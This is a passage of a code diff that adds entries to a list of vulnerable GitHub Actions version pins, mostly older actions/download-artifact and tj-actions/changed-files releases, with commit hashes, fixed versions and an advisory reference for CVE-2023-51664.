["actions/download-artifact", "v2.1.1", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v2.1.0", "f023be2c48cc18debc3bacd34cb396e0295e2869", "4.1.7"] + - ["actions/download-artifact", "v2.0.10", "3be87be14a055c47b01d3bd88f8fe02320a9bb60", "4.1.7"] + - ["actions/download-artifact", "v2.0.9", "158ca71f7c614ae705e79f25522ef4658df18253", "4.1.7"] + - ["actions/download-artifact", "v2.0.8", "4a7a711286f30c025902c28b541c10e147a9b843", "4.1.7"] + - ["actions/download-artifact", "v2.0.7", "f144d3c3916a86f4d6b11ff379d17a49d8f85dbc", "4.1.7"] + - ["actions/download-artifact", "v2.0.6", "f8e41fbffeebb48c0273438d220bb2387727471f", "4.1.7"] + - ["actions/download-artifact", "v2.0.5", "c3f5d00c8784369c43779f3d2611769594a61f7a", "4.1.7"] + - ["actions/download-artifact", "v2.0.4", "b3cedea9bed36890c824f4065163b667eeca272b", "4.1.7"] + - ["actions/download-artifact", "v2.0.3", "80d2d4023c185001eacb50e37afd7dd667ba8044", "4.1.7"] + - ["actions/download-artifact", "v2.0.2", "381af06b4268a1e0ad7b7c7e5a09f1894977120f", "4.1.7"] + - ["actions/download-artifact", "v2.0.1", "1ac47ba4b6af92e65d0438b64ce1ea49ce1cc48d", "4.1.7"] + - ["actions/download-artifact", "v2.0", "1de1dea89c32dcb1f37183c96fe85cfe067b682a", "4.1.7"] + - ["actions/download-artifact", "v2", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "v1", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + + # tj-actions/changed-files + # https://github.com/advisories/GHSA-mcph-m25j-8j63 + # CVE-2023-51664 + - ["tj-actions/changed-files", "v40.2.3", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v40.2.2", "94549999469dbfa032becf298d95c87a14c34394", "41"] + - ["tj-actions/changed-files", "v40.2.1", "1c938490c880156b746568a518594309cfb3f66b", "41"] + - ["tj-actions/changed-files", "v40.2.0", "da093c1609db0edd0a037ce9664e135f74bf30d9", "41"] + - ["tj-actions/changed-files", "v40.1.1", "25ef3926d147cd02fc7e931c1ef50772bbb0d25d", "41"] + - ["tj-actions/changed-files", "v40.1.0", "18c8a4ecebe93d32ed8a88e1d0c098f5f68c221b", "41"] + - ["tj-actions/changed-files", "v40.0.2", "40526807ee1e208a1a8c1bbe6bd2d1b044ef6368", "41"] + - ["tj-actions/changed-files", "v40.0.1", "bfc49f4cff6934aa236c171f9bcbf1dd6b1ef438", "41"] + - ["tj-actions/changed-files", "v40.0.0", "af292f1e845a0377b596972698a8598734eb2796", "41"] + - ["tj-actions/changed-files", "v40", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v39.2.4", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v39.2.3", "95690f9ece77c1740f4a55b7f1de9023ed6b1f87", "41"] + - ["tj-actions/changed-files", "v39.2.2", "408093d9ff9c134c33b974e0722ce06b9d6e8263", "41"] + - ["tj-actions/changed-files", "v39.2.1", "db153baf731265ad02cd490b07f470e2d55e3345", "41"] + - ["tj-actions/changed-files", "v39.2.0", "8238a4103220c636f2dad328ead8a7c8dbe316a3", "41"] + - ["tj-actions/changed-files", "v39.1.2", "41960309398d165631f08c5df47a11147e14712b", "41"] + - ["tj-actions/changed-files", "v39.1.1", "a21a533a0c244a27daac02f9dc6fcf8aeb996154", "41"] + - ["tj-actions/changed-files", "v39.1.0", "8e79ba7ab9fee9984275219aeb2c8db47bcb8a2d", "41"] + - ["tj-actions/changed-files", "v39.0.3", "76c4d81a6acd339b55bd7407a016981c853eb702", "41"] + - ["tj-actions/changed-files", "v39.0.2", "6ee9cdc5816333acda68e01cf12eedc619e28316", "41"] + - ["tj-actions/changed-files", "v39.0.1", "246636f5fa148b5ad8e65ca4c57b18af3123e5f6", "41"] + - ["tj-actions/changed-files", "v39.0.0", "48566bbcc22ceb7c5809ebdd27377309f2c3de8c", "41"] + - ["tj-actions/changed-files", "v39", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v38.2.2", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v38.2.1", "2f7246cb26e8bb6709b6cbfc1fec7febfe82e96a", "41"] + - ["tj-actions/changed-files", "v38.2.0", "0fc9663aa70243d87319dbd32fd926344d18d38f", "41"] + - ["tj-actions/changed-files", "v38.1.3", "c860b5c47fa71f461da850094ef2f6e3d6514e44", "41"] + - ["tj-actions/changed-files", "v38.1.2", "2f8b80270f04e421b28efb2abaccef4fce4815b6", "41"] + - ["tj-actions/changed-files", "v38.1.1", "b7f1b7347fea1df67230801b66081fe3cba7dc69", "41"] + - ["tj-actions/changed-files", "v38.1.0", "1c26215f3fbd51eba03bc199e5cbabdfc3584ce3", "41"] + - ["tj-actions/changed-files", "v38.0.0", "17f3fec1edef0c3916d59cbcee1585fcd457e456", "41"] + - ["tj-actions/changed-files", "v38", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v37.6.1", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v37.6.0", "87697c0dca7dd44e37a2b79a79489332556ff1f3", "41"] + - ["tj-actions/changed-files", "v37.5.2", "85c8b8252fc9893e00b3633a16670e53040e6d71", "41"] + - ["tj-actions/changed-files", "v37.5.1", "a96679dfee2a1e64b1db5a210c0ffaf1f2cb24ce", "41"] + - ["tj-actions/changed-files", "v37.5.0", "920e7b9ae1d45913fc81f86c956fee89c77d2e5e", "41"] + - ["tj-actions/changed-files", "v37.4.0", "de0eba32790fb9bf87471b32855a30fc8f9d5fc6", "41"] + - ["tj-actions/changed-files", "v37.3.0", "39283171cefdf491e0f0d6cf285b86b31eb6f3cd", "41"] + - ["tj-actions/changed-files", "v37.2.0", "68b429ddc666ea0dba46309e1ee45e06bb408df8", "41"] + - ["tj-actions/changed-files", "v37.1.2", "2a968ff601949c81b47d9c1fdb789b0d25ddeea2", "41"] + - ["tj-actions/changed-files", "v37.1.1", "1f20fb83f05eabed6e12ba0329edac8b6ec8e207", "41"] + - ["tj-actions/changed-files", "v37.1.0", "87e23c4c79a603288642711155953c7da34b11ac", "41"] + - ["tj-actions/changed-files", "v37.0.5", "54849deb963ca9f24185fb5de2965e002d066e6b", "41"] + - ["tj-actions/changed-files", "v37.0.4", "bb3376162b179308a79fc4450262a15a8e1d6888", "41"] + - ["tj-actions/changed-files", "v37.0.3", "ec1e14cf27f4585783f463070881b2c499349a8a", "41"] + - ["tj-actions/changed-files", "v37.0.2", "2106eb4457dd2aba4d37c8cdd16acba5d18739b9", "41"] + - ["tj-actions/changed-files", "v37.0.1", "e5efec47f620e0fde64a1ad8f53bbf53d51a8c97", "41"] + - ["tj-actions/changed-files", "v37.0.0", "5817a9efb0d7cc34b917d8146ea10b9f32044968", "41"] + - ["tj-actions/changed-files", "v37", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v36.4.1", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v36.4.0", "e1754a427f478b8778d349341b8f1d80f1f47f44", "41"] + - ["tj-actions/changed-files", "v36.3.0", "9bf09145c3560e451e8d8e87b42ccb3fef5b692d", "41"] + - ["tj-actions/changed-files", "v36.2.1", "c9124514c375de5dbb9697afa6f2e36a236ee58c", "41"] + - ["tj-actions/changed-files", "v36.2.0", "174a2a6360b54a2019877c254c4be78106efc94f", "41"] + - ["tj-actions/changed-files", "v36.1.0", "fb20f4d24890fadc539505b1746d260504b213d0", "41"] + - ["tj-actions/changed-files", "v36.0.18", "07e0177b72d3640efced741cae32f9861eee1367", "41"] + - ["tj-actions/changed-files", "v36.0.17", "b13786805affca18e536ed489687d3d8d1f05d21", "41"] + - ["tj-actions/changed-files", "v36.0.16", "1aae16084af435f73c8cdfd742473028810c5f20", "41"] + - ["tj-actions/changed-files", "v36.0.15", "5d2fcdb4cbef720a52f49fd05d8c7edd18a64758", "41"] + - ["tj-actions/changed-files", "v36.0.14", "9ecc6e7fe2e26945b52485ccd9bc4b44000f5af1", "41"] + - ["tj-actions/changed-files", "v36.0.13", "8c9ee56d0180a538ad5b6b8a208e4db974bad9c0", "41"] + - ["tj-actions/changed-files", "v36.0.12", "5978e5a2df95ef20cde627d4acb5edd1f87ba46a", "41"] + - ["tj-actions/changed-files", "v36.0.11", "17c3e9e98f47ef859502ba3e38be0b8a6a4bddd9", "41"] + - ["tj-actions/changed-files", "v36.0.10", "3f7b5c900bdbf1b80a825e220413986227b3ff03", "41"] + - ["tj-actions/changed-files", "v36.0.9", "cf4fe8759a45edd76ed6215da3529d2dbd2a3c68", "41"] + - ["tj-actions/changed-files", "v36.0.8", "043929ee8fffa1dd1d619782a5a338cf39e76e23", "41"] + - ["tj-actions/changed-files", "v36.0.7", "4e2535f2b330e70ff7055f7de4272653cfdbd555", "41"] + - ["tj-actions/changed-files", "v36.0.6", "652648acb4f32660a94e245a2a51c6d0e56b2a1d", "41"] + - ["tj-actions/changed-files", "v36.0.5", "9ad1a5b96ab3e56cd2bb25ff90c6271e4e70eb71", "41"] + - ["tj-actions/changed-files", "v36.0.4", "c798a4ea57f0e0a9d2b5374853c9c479ebb435a2", "41"] + - ["tj-actions/changed-files", "v36.0.3", "25eaddf37ae893cec889065e9a60439c8af6f089", "41"] + - ["tj-actions/changed-files", "v36.0.2", "abef388dd913ce13a650bbf800eba73961657fb9", "41"] + - ["tj-actions/changed-files", "v36.0.1", "1c2673b763ea086acd660dd4257c9be06eb77667", "41"] + - ["tj-actions/changed-files", "v36.0.0", "53c377a374b445ec2a61e343068807bf41f2c9a6", "41"] + - ["tj-actions/changed-files", "v36", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v35.9.3", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35.9.3-sec", "8663bb8fc810b983a35585a2dd6a121c09d2590d", "41"] + - ["tj-actions/changed-files", "v35.9.2", "b2d17f51244a144849c6b37a3a6791b98a51d86f", "41"] + - ["tj-actions/changed-files", "v35.9.2-sec", "4fc4e9d28ecb58e0215483343f3dd2fd01178f42", "41"] + - ["tj-actions/changed-files", "v35.9.1", "4a0aac0d19aa2838c6741fdf95a5276390418dc2", "41"] + - ["tj-actions/changed-files", "v35.9.1-sec", "89daa3bca3cd1f2967097668c0e8b5f7dda4d57f", "41"] + - ["tj-actions/changed-files", "v35.9.0", "ce810b29b28abf274afebdcd8fe47b8fba0f28bd", "41"] + - ["tj-actions/changed-files", "v35.9.0-sec", "2e61fb6a48f5857e3a338b4cbf071e1164c060e9", "41"] + - ["tj-actions/changed-files", "v35.8.0", "7ecfc6730dff8072d1cc5215a24cc9478f55264d", "41"] + - ["tj-actions/changed-files", "v35.8.0-sec", "21d7a75834ad73fed7fa33b39b73ebe6495ee4e1", "41"] + - ["tj-actions/changed-files", "v35.7.12", "b109d83a62e94cf7c522bf6c15cb25c175850b16", "41"] + - ["tj-actions/changed-files", "v35.7.12-sec", "2be7c3758f3e6e45ae5d27c133a3260c5b0fdd60", "41"] + - ["tj-actions/changed-files", "v35.7.11", "79adacd43ea069e57037edc891ea8d33013bc3da", "41"] + - ["tj-actions/changed-files", "v35.7.11-sec", "123dfd48407ae53e33a73e2ae9adf9d8ad8b14d6", "41"] + - ["tj-actions/changed-files", "v35.7.10", "6e426e6495fa7ea3451f37ce3f1dac2a3f16f62c", "41"] + - ["tj-actions/changed-files", "v35.7.10-sec", "61bf27253df806648581aaddd4a8ec394b968c80", "41"] + - ["tj-actions/changed-files", "v35.7.9", "5e2d64b30d51d557c5a29309ecbd5481a236ec77", "41"] + - ["tj-actions/changed-files", "v35.7.9-sec", "b94d96993dacb3158c51d22c3afae1f4059a71d2", "41"] + - ["tj-actions/changed-files", "v35.7.8", "e9b5807e928fc8eea705c90da5524fd44b183ba1", "41"] + - ["tj-actions/changed-files", "v35.7.8-sec", "22bed7e94fbb176468579214290dfd84abc6ea86", "41"] + - ["tj-actions/changed-files", "v35.7.7", "db5dd7c176cf59a19ef6561bf1936f059dee4b74", "41"] + - ["tj-actions/changed-files", "v35.7.7-sec", "7795905b24e743c8c33cd5ba5cd256cc92c81f68", "41"] + - ["tj-actions/changed-files", "v35.7.6", "07f86bcdc42639264ec561c7f175fea5f532b6ce", "41"] + - ["tj-actions/changed-files", "v35.7.6-sec", "08d9eb809753cbbaf6c8256285605312ce3987b9", "41"] + - ["tj-actions/changed-files", "v35.7.5", "3a3ec498d8976e74f5dd829c413c1d446e738df7", "41"] + - ["tj-actions/changed-files", "v35.7.4", "ee137444f0b3b0855cb2fc7df807416ba2c3d311", "41"] + - ["tj-actions/changed-files", "v35.7.3", "cda290230383045a8887a250c2abf796bf1dc6da", "41"] + - ["tj-actions/changed-files", "v35.7.2", "9328bab880abf4acc377d77718d28c6ac167f154", "41"] + - ["tj-actions/changed-files", "v35.7.1", "4e680e146a8e1b530a912f0a1fdc2f0ace7d1bb7", "41"] + - ["tj-actions/changed-files", "v35.7.1-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v35.7.0", "bd376fbcfae914347656e4c70801e2a3fafed05b", "41"] + - ["tj-actions/changed-files", "v35.7.0-sec", "1d1543af8cef13eb42c756e9425e2cc50e8030b0", "41"] + - ["tj-actions/changed-files", "v35.6.4", "84ed30e2f4daf616144de7e0c1db59d5b33025e3", "41"] + - ["tj-actions/changed-files", "v35.6.3", "74b06cafc9658d2a91cc5ceb920fd6b5a5649051", "41"] + - ["tj-actions/changed-files", "v35.6.2", "5ce975c6021a0b11062c547acb6c26c96a34a8c5", "41"] + - ["tj-actions/changed-files", "v35.6.1", "04124efe7560d15e11ea2ba96c0df2989f68f1f4", "41"] + - ["tj-actions/changed-files", "v35.6.0", "3ee6abf6107ccc2d8ee538de7ff6b1fb644f5d60", "41"] + - ["tj-actions/changed-files", "v35.5.6", "23e3c4300cb904a9d9c36fc2df4111a2fa9b9ff1", "41"] + - ["tj-actions/changed-files", "v35.5.5", "5a331a4999f9f21a3ef2a6459edee90393a8b92a", "41"] + - ["tj-actions/changed-files", "v35.5.4", "74338865c1e73fee674ce5cfc5d28f4b9caa33bc", "41"] + - ["tj-actions/changed-files", "v35.5.3", "d5414fd30b0b7618c815fe7ebe5673720e081937", "41"] + - ["tj-actions/changed-files", "v35.5.2", "7f2aa19bdcf4a00195671e368091a1e32a694ac5", "41"] + - ["tj-actions/changed-files", "v35.5.1", "210cc839c24f532fe4fbf510b7b3314ca9a2b90b", "41"] + - ["tj-actions/changed-files", "v35.5.0", "db3ea27a0cf07135175be5efe7aaf84df6e0e6f0", "41"] + - ["tj-actions/changed-files", "v35.4.4", "57d9664f8e2aa45f26bcb59095f99aa47ae8e90d", "41"] + - ["tj-actions/changed-files", "v35.4.3", "0953088baa540166372190bec608cad1603a787d", "41"] + - ["tj-actions/changed-files", "v35.4.2", "0562b9f865df79542dfcd59cfbd14c9ac9a792d3", "41"] + - ["tj-actions/changed-files", "v35.4.1", "487675b843e203b5c9a92a07f1ed763d046d7283", "41"] + - ["tj-actions/changed-files", "v35.4.0", "9a6dabf8d15381f97f1c770257a1a0db59c28a47", "41"] + - ["tj-actions/changed-files", "v35.3.2", "7839ede089e483df865be448d6f3652f875005e0", "41"] + - ["tj-actions/changed-files", "v35.3.1", "c2296c1b044b4f5c97d310a6d31e95cbcb5583ec", "41"] + - ["tj-actions/changed-files", "v35.3.0", "ea251d4d2f03a9c18841ae1b752f58b82dfb4d5e", "41"] + - ["tj-actions/changed-files", "v35.2.1", "1d1287f9fafd92be283f99b781fb5f00f00dd471", "41"] + - ["tj-actions/changed-files", "v35.2.0", "392359fc8c85be1a8752e9ab6b1ad9e45158b4a9", "41"] + - ["tj-actions/changed-files", "v35.1.2", "7f33882a1271950f8592f96b77e694436bfee83b", "41"] + - ["tj-actions/changed-files", "v35.1.1", "1d8a2f91371fd14ec6146c37cbae79526144fbe9", "41"] + - ["tj-actions/changed-files", "v35.1.0", "0626c3f94002c0a9d7491dd7fed7055bbdff6f92", "41"] + - ["tj-actions/changed-files", "v35.0.1", "a2b1e5dbb92d21753cf198228fbf2d0a8557f117", "41"] + - ["tj-actions/changed-files", "v35.0.0", "110b9baa5fc65597d65c1d019c6d3aee16d00c53", "41"] + - ["tj-actions/changed-files", "v35", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v34.6.2", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v34.6.1", "3b6c057cd82d1dafab565df2ba9fa489574a03b8", "41"] + - ["tj-actions/changed-files", "v34.6.0", "4f64429e8be26fe81a594635b07ed829581ea847", "41"] + - ["tj-actions/changed-files", "v34.5.4", "3f1e44af6ca48144748dfc62a7a6fb22e4ca67f3", "41"] + - ["tj-actions/changed-files", "v34.5.3", "74dc2e8a7877b725678a2195226bd470f10c481b", "41"] + - ["tj-actions/changed-files", "v34.5.2", "8356a01788b5a36aa0319e74183f3237e020feac", "41"] + - ["tj-actions/changed-files", "v34.5.1", "baaf598b46c2d9eb97eb995c9f69d1967349155d", "41"] + - ["tj-actions/changed-files", "v34.5.0", "8a4cc4fbd67975557b6d85dd302f5f9400b9c92e", "41"] + - ["tj-actions/changed-files", "v34.4.4", "8a7336fb6f6bc00da867b745d3491de42ac0231b", "41"] + - ["tj-actions/changed-files", "v34.4.3", "3996bc3fded83a011dbfc57f379fd31266770b3a", "41"] + - ["tj-actions/changed-files", "v34.4.2", "ef0a29048c50f844e30fac9fef80956f9765aab8", "41"] + - ["tj-actions/changed-files", "v34.4.1", "3ebdc42d8ba53fedc5bef0f16181249ac58446fa", "41"] + - ["tj-actions/changed-files", "v34.4.0", "94e6fba8d802f0fa80db51937e8752e9c165ee26", "41"] + - ["tj-actions/changed-files", "v34.3.4", "3dbb79f46716e706df6be563a268df44b264b545", "41"] + - ["tj-actions/changed-files", "v34.3.3", "991e8b3aae0ebbe0614b15b05d14ccb92affa24a", "41"] + - ["tj-actions/changed-files", "v34.3.2", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.1", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.0", "5f89dc7d6eefdcb7323e773671fd3461a7c2f050", "41"] + - ["tj-actions/changed-files", "v34.2.2", "734bb168e38279dfc7aa2af5d5be3a1475427a99", "41"] + - ["tj-actions/changed-files", "v34.2.1", "d2e030b6ed85ce2db7ac1a4afc574640df8bca26", "41"] + - ["tj-actions/changed-files", "v34.2.0", "6ba3c59bc6825f1ad375d92a9e70c6b275db0ddd", "41"] + - ["tj-actions/changed-files", "v34.1.1", "d0e44775cd5572bb0ead1d7d2e399015644f7359", "41"] + - ["tj-actions/changed-files", "v34.1.0", "b91acef304123e58fd6671ab267d6b5e2a7f2ef3", "41"] + - ["tj-actions/changed-files", "v34.0.5", "12633630aba2ab48ec2ad8a3344dd736d61a7b89", "41"] + - ["tj-actions/changed-files", "v34.0.4", "71840771e95943b1ab0c8f8ae45aeb0a34458e2e", "41"] + - ["tj-actions/changed-files", "v34.0.3", "cbfb0fda5afcfbf4ef0ef854bf0d8210abd0866f", "41"] + - ["tj-actions/changed-files", "v34.0.2", "932dad31974f07bd23cab5870d45c6e5ad5c8b73", "41"] + - ["tj-actions/changed-files", "v34.0.1", "9f289689bb8364780830da00b69507b88b5a2f07", "41"] + - ["tj-actions/changed-files", "v34.0.0", "c4d29bf5b2769a725bcc9a723c498ba9c34c05b4", "41"] + - ["tj-actions/changed-files", "v34", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v33.0.0", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v33", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v32.1.2", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v32.1.1", "8953e851a137075e59e84b5c15fbeb3617e82f15", "41"] + - ["tj-actions/changed-files", "v32.1.0", "8de562e9316b23c4473ad852e5fd4f7f2bac7bc8", "41"] + - ["tj-actions/changed-files", "v32.0.1", "7c640bd299646362775f9d02e156bc741f67453b", "41"] + - ["tj-actions/changed-files", "v32.0.0", "270645280afddc7e2cf3f4867089522c8f2f8f9a", "41"] + - ["tj-actions/changed-files", "v32", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v31.0.3", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v31.0.2", "528984a4f814905ea80ed2a3818afc97aef8b0de", "41"] + - ["tj-actions/changed-files", "v31.0.1", "75af1a47c484c669beec6a1d00fc9d1d78179725", "41"] + - ["tj-actions/changed-files", "v31.0.0", "5184a750a66da08aba414ca223aef75c055956a5", "41"] + - ["tj-actions/changed-files", "v31", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v30.0.0", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v30", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v29.0.9", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v29.0.8", "df4dacaa89cace34cd60d5e9580f041a041e5233", "41"] + - ["tj-actions/changed-files", "v29.0.7", "602081b5d9327a7770b4c447a4ee8984ae44e72e", "41"] + - ["tj-actions/changed-files", "v29.0.6", "6e12407521ea9b0d11a4b7ab09b40266bd39496a", "41"] + - ["tj-actions/changed-files", "v29.0.5", "c5c9b6ff9e75d84d8b69cbf82bcfbf61672ef91e", "41"] + - ["tj-actions/changed-files", "v29.0.4", "c41b7152594c4423f3787d26662239eb0ae027c0", "41"] + - ["tj-actions/changed-files", "v29.0.3", "60f4aabced9b4718c75acef86d42ffb631c4403a", "41"] + - ["tj-actions/changed-files", "v29.0.2", "82edb42dc4e3a5d5edf24cc3ae4b1f55c20cc220", "41"] + - ["tj-actions/changed-files", "v29.0.1", "18edda74753bbb7090ea030c1f80ef9610ebdff1", "41"] + - ["tj-actions/changed-files", "v29.0.0", "bec82ebb3493119ba317fcee8a0d1db09d39d1ac", "41"] + - ["tj-actions/changed-files", "v29", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v28.0.0", "28ac6724247a133793509b5d165d58319b40a171", "41"] + - ["tj-actions/changed-files", "v28", "602cf940579b9a2b2db0aafe835bfdb675fac12c", "41"] + - ["tj-actions/changed-files", "v27", "5e56dcabdd4a97ea745791856930038be56d9b70", "41"] + - ["tj-actions/changed-files", "v26.1", "58ae566dc69a926834e4798bcfe0436ff97c0599", "41"] + - ["tj-actions/changed-files", "v26", "7394701157dae4adb4eaa75d8c99e9b2edff81fe", "41"] + - ["tj-actions/changed-files", "v25", "36e65a11651994e93d6f1ef3afa781c3dcbb9780", "41"] + - ["tj-actions/changed-files", "v24.1", "bf6ddb7db66f9da5b2cffeb28b2b696aacb26e1c", "41"] + - ["tj-actions/changed-files", "v24", "6c44eb8294bb9c93d6118427f4ff8404b695e1d7", "41"] + - ["tj-actions/changed-files", "v23.2", "b2ee165d6b42ab1740e1037eb93748aad96767c5", "41"] + - ["tj-actions/changed-files", "v23.1", "34a865a2b221bd60ec0d4c071f5e7a66ffdac88a", "41"] + - ["tj-actions/changed-files", "v23", "fb1fe28aa9ff24afc553b37545437005a4cf2115", "41"] + - ["tj-actions/changed-files", "v22.2", "ae90a0b602c90d598c0c027a519493c1a069543e", "41"] + - ["tj-actions/changed-files", "v22.1", "bc1dc8f54db8eeeaae00ab92737ab34926b9ad8d", "41"] + - ["tj-actions/changed-files", "v22", "3de1f9a283b61f308ee3045be4d301037657225a", "41"] + - ["tj-actions/changed-files", "v21", "0edfedf16d9ff0903cbe599d474a022823ca8fb8", "41"] + - ["tj-actions/changed-files", "v20.2", "205450238e81d3da0e0ec2d776f58c12846fddfb", "41"] + - ["tj-actions/changed-files", "v20.1", "944a8b89098b24b0723ed9264888eb7fcffbbe9a", "41"] + - ["tj-actions/changed-files", "v20", "581eef0495dd5b75a3dd93047ff9f0d42dc09370", "41"] + - ["tj-actions/changed-files", "v19.3", "e55f7fb99e90111108bc24d3f14156b06ab6a12c", "41"] + - ["tj-actions/changed-files", "v19.2", "07b38ce1a17c46f1d0eb1150c8a33f703d473262", "41"] + - ["tj-actions/changed-files", "v19.1", "d26252004aa87df12f72411feec056907ecdbadc", "41"] + - ["tj-actions/changed-files", "v19", "a6d456f542692915c5289ea834fb89bc07c11208", "41"] + - ["tj-actions/changed-files", "v18.7", "a59f800cbb60ed483623848e31be67659a2940f8", "41"] + - ["tj-actions/changed-files", "v18.6", "a2f1692a6f703b7a14e155ae404e6bb15538b763", "41"] + - ["tj-actions/changed-files", "v18.5", "72aab29255d4fd553ccf1c0fa3223dcc62a2fd84", "41"] + - ["tj-actions/changed-files", "v18.4", "e35d0afdc1f0b01f84ec0f4cdf1b179325634b36", "41"] + - ["tj-actions/changed-files", "v18.3", "081ee9cc54a7ded6c421c632f23a31dbbe34a5f3", "41"] + - ["tj-actions/changed-files", "v18.2", "1f30bd2085b83668fb636f1a1f90744d8adbacca", "41"] + - ["tj-actions/changed-files", "v18.1", "227e314ad84036340cab47e649d91b012275a53c", "41"] + - ["tj-actions/changed-files", "v18", "ffd30e8dd820b89653c2298acf0447d29dbd0f16", "41"] + - ["tj-actions/changed-files", "v17.3", "f5a8de7d36c5909d300d7fcc8d6340d2a56ab9d9", "41"] + - ["tj-actions/changed-files", "v17.2", "0bc7d4006fb085334217ec5d6e6c288daade2f59", "41"] + - ["tj-actions/changed-files", "v17.1", "a53d74f700f2982646d538e66ce35cbfc8d4e826", "41"] + - ["tj-actions/changed-files", "v17", "933541631c41bad3fe20bdbd440ec68afa9a9518", "41"] + - ["tj-actions/changed-files", "v16", "4daffbaee17b34b8ae544990906277485819cc16", "41"] + - ["tj-actions/changed-files", "v15.1", "4b1f26aed507a21569666773e1c753dfe409d806", "41"] + - ["tj-actions/changed-files", "v15", "09441d38eaf8b76cbe2c42e256f46dfb432f63a4", "41"] + - ["tj-actions/changed-files", "v14.7", "e44053b6a0e8e7df1aa50a171c46601c605f61bb", "41"] + - ["tj-actions/changed-files", "v14.6", "c0dba8199070f01fcea9cd3a4dc42b365f06bf8d", "41"] + - ["tj-actions/changed-files", "v14.5", "fd2e9917c337ba7e2222d5aa9e32b27a57a71d14", "41"] + - ["tj-actions/changed-files", "v14.4", "2a8a501ad614cd775a2c07537b555783496dc085", "41"] + - ["tj-actions/changed-files", "v14.3", "a8ea7202c1c248d93235e87cc59e5b3a9881f558", "41"] + - ["tj-actions/changed-files", "v14.2", "88edda5361ed308226d6cb938eaa8b18182750f5", "41"] + - ["tj-actions/changed-files", "v14.1", "be68c10267c4979ed30c9397041b052b2980f91f", "41"] + - ["tj-actions/changed-files", "v14", "b59431bc7d44f9e8951a290fc7d48879f2ca1939", "41"] + - ["tj-actions/changed-files", "v13.2", "68bd279d40fb5bfc976429283b060c6ee426f63c", "41"] + - ["tj-actions/changed-files", "v13.1", "2c85495a7bb72f2734cb5181e29b2ee5e08e61f7", "41"] + - ["tj-actions/changed-files", "v13", "f276697f3b86a1d897052524507c59f5e173ccd1", "41"] + - ["tj-actions/changed-files", "v12.2", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v12.1", "f56e736bedd192c12951db94e83a440885d04eb1", "41"] + - ["tj-actions/changed-files", "v12", "019a09d36e5b592a6770a9a71ef1b3efd9a85d37", "41"] + - ["tj-actions/changed-files", "v11.9", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v11.8", "b42f932be5b3fee4a990cb3e03478d5da2d4293b", "41"] + - ["tj-actions/changed-files", "v11.7", "8dfe0ee3f4840f84a7947b5288b19d7a583755ae", "41"] + - ["tj-actions/changed-files", "v11.6", "aae164d51be780a235cdeea89752bbacbbfee3c3", "41"] + - ["tj-actions/changed-files", "v11.5", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v11.4", "b54a7ae7259d0729d0b582bac28b05462f16cd64", "41"] + - ["tj-actions/changed-files", "v11.3", "902e60737927ccef3713faad3752d84f1153d7ac", "41"] + - ["tj-actions/changed-files", "v11.2", "2b51570d5f086eb07a1e527a182773b2045ec26b", "41"] + - ["tj-actions/changed-files", "v11.1", "040111b36775c1033b4703b77f9c5c203da18936", "41"] + - ["tj-actions/changed-files", "v11", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v10.1", "1d34e69895b85e643b9b259d54f395f0d1e27c10", "41"] + - ["tj-actions/changed-files", "v10", "b86b537e2b78397b630cfb1a8d0aec1e03379737", "41"] + - 